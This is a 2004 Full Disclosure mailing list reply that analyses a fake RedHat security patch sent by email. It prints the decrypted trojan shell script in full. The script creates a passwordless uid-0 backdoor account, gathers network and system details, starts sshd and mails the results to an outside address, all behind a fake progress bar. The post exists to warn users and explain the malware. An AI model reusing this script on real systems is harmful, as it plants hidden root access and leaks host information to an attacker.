Full Disclosure mailing list archives

Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Andrew Farmer <andfarm () teknovis com>
Date: Sun, 24 Oct 2004 18:18:41 -0700

Hugo van der Kooij wrote:

Be advised.
The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.
Message was send from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but othermight
be.
And while it lasts you may want to get the file for your owneducational
purposes.

<snip>

I did a quickie analysis of the program (which is basically justdistributed as source!).

Strings are encrypted with arcfour; however, as the keys are includedtoo, decrypting them is no problem.


pswd[] is an initialization vector for arcfour.

shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$@"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR

opts[], text[], and chk2[] are encrypted with some (apparentlyconstant) data retrieved by statting /bin/sh.

To cut to the chase, the whole thing ends up clearing the screen andrunning the following shell script:

#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then

echo "This patch must be applied as \"root\", and you are:\"`whoami`\""

        exit
fi

echo "Identifying the system. This may take up to 2 minutes. Pleasewait ..."

sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
 echo "Inca un root frate belea: " >> /tmp/mama
 adduser -g 0 -u 0 -o bash >> /tmp/mama
 passwd -d bash >> /tmp/mama
 ifconfig >> /tmp/mama
 uname -a >> /tmp/mama
 uptime >> /tmp/mama
 sshd >> /tmp/mama
 echo "user bash stii tu" >> /tmp/mama

cat /tmp/mama | mail -s "Inca o roata" root () addlebrain com >>/dev/null

 rm -rf /tmp/mama
 mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi

bla()
{
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 3
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 4
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo "#"
  sleep 1
}

echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo

echo "System updated and secured successfuly. You may erase thesefiles."

sleep 1

Attachment: PGP.sig
Description: This is a digitally signed message part

Current thread:

FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Hugo van der Kooij (Oct 24)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Harry Hoffman (Oct 24)
  - Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Andrew Farmer (Oct 24)
    - Re: [security] Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Brett Campbell (Oct 26)
  - Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Vincent Archer (Oct 25)
- <Possible follow-ups>
- FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Feher Tamas (Oct 25)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Stephen Jimson (Oct 26)